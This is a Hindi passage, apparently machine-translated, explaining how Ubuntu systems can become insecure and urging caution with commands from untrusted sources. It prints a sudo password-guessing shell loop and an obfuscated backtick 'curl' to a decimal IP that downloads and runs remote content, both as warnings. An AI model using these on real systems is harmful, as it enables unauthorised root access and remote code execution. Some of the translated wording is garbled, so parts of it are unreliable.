स्वयं रूट पासवर्ड क्रैक करना संभव नहीं है, क्योंकि उबंटू डिफ़ॉल्ट रूप से रूट उपयोगकर्ता को अक्षम कर देता है। हालाँकि, यदि आपका उपयोगकर्ता sudo के माध्यम से रूट बन सकता है और आपका पासवर्ड अनुमान / ब्रूट-फ़ोर्स के लिए आसान है, तो आप एक असुरक्षित सिस्टम हैं। उदाहरण स्क्रिप्ट कुछ पासवर्ड का परीक्षण करने की कोशिश कर रहा है:
#!/bin/sh
for pass in password 123 ubuntu pass; do
echo $pass|sudo -S evil_command
done
एक अविश्वसनीय भंडार जोड़ने से उस भंडार से प्रोग्राम स्थापित किए जा सकते हैं। यहां तक कि अगर आप स्पष्ट रूप से एक एप्लिकेशन इंस्टॉल नहीं करते हैं sudo apt-get install [app-from-repo]
, जैसे कि रिपॉजिटरी अभी भी अन्य कार्यक्रमों को प्रभावित कर सकती है, तो उबंटू का मानना है कि रिपॉजिटरी में एक निश्चित प्रोग्राम का एक नया संस्करण शामिल है।
अद्यतन प्रक्रिया को रूट के रूप में चलाया जाता है, अन्यथा फ़ाइलों को लिखा नहीं जा सकता है /usr/bin
या नहीं /etc
। एक इंस्टॉलेशन ट्रिगर रूट के रूप में भी चलाया जाता है और मनमाने ढंग से, और संभवतः, हानिकारक कमांड चला सकता है। अब, चिंतित न हों, कार्यक्रमों को अपडेट करने के लिए मैनुअल एक्शन की आवश्यकता होती है और उबंटू रिपॉजिटरी सुरक्षित हैं। विंडोज जैसे क्लोज्ड सोर्स सॉफ्टवेयर पर कभी भी पूरी तरह से भरोसा नहीं किया जा सकता क्योंकि आप दुर्भावनापूर्ण कोड के लिए स्रोत की जांच नहीं कर सकते हैं, लेकिन यदि आप की जरूरत है (तो आप इस तरह sun-java6
या फ्लैश के मालिकाना कार्यक्रमों पर लागू नहीं होते हैं ) उबंटू आवेदन के स्रोत की समीक्षा कर सकते हैं ।
जेवियर रिवेरा के अनुसार, कर्नेल बग में मनमाना कोड निष्पादन हो सकता है, लेकिन बगेड सॉफ्टवेयर संभवतः खतरनाक होते हैं, विशेष रूप से छोटी गाड़ी setsuid
रूट बायनेरिज़ (बायनेरी जो फ़ाइल मालिक, रूट के तहत चलेगी) और रूट के रूप में चलने वाले अन्य छोटी गाड़ी के कार्यक्रम।
आप अपने सिस्टम पर सुरक्षा छेद बना सकते हैं यदि आप उस पर ध्यान नहीं देते हैं जो आप कर रहे हैं। उदाहरण के लिए, क्रोनॉजर्स की अवधारणा को पूरी तरह से समझने के बिना, आपने एक क्रोनजॉब जोड़ा है /etc/cron.daily
जो आपके घर के फ़ोल्डर में एक प्रोग्राम चलाता है (उदाहरण के लिए /bin/sh /home/your-username/myscript.sh
। यदि myscript.sh फ़ाइल आपके द्वारा नष्ट कर दी गई है, तो आपके द्वारा डिलीट किया जा सकता है, एक शोषण दुर्भावनापूर्ण डाल सकता है। कोड myscript.sh
जिसमें रूट (विशेषाधिकार वृद्धि) के रूप में चलाया जाएगा।
सुरक्षित रहने के लिए, अपने दिमाग का उपयोग करें! यदि आप नहीं जानते कि यह क्या करता है, तो अविश्वसनीय स्रोतों से कमांड न चलाएं। अगर कोई कहता है कि `curl 3221233674`
बैक-टिक के साथ भागो , नहीं। 3221233674 लिखने का एक और तरीका है 192.0.32.10
(example.com का IP)। तो, यह बराबर होगा:
`curl http://example.com/`
उन बैक-टिक्स के कारण आउटपुट को शेल कमांड के रूप में निष्पादित किया जाता है। सादे अंग्रेजी में, "पृष्ठ http://example.com/ डाउनलोड करें और डाउनलोड किए गए पृष्ठ को निष्पादित करने का प्रयास करें"।
सबसे पहले, आपको दिए गए कमांड में कुछ दुर्भावनापूर्ण नहीं दिखाई देगा। लेकिन अब, आप जानते हैं कि इसका दुरुपयोग भी किया जा सकता है।
हमेशा इंटरनेट की तरह, आप अविश्वसनीय स्रोतों से प्राप्त कमांड / स्क्रिप्ट की जांच करें।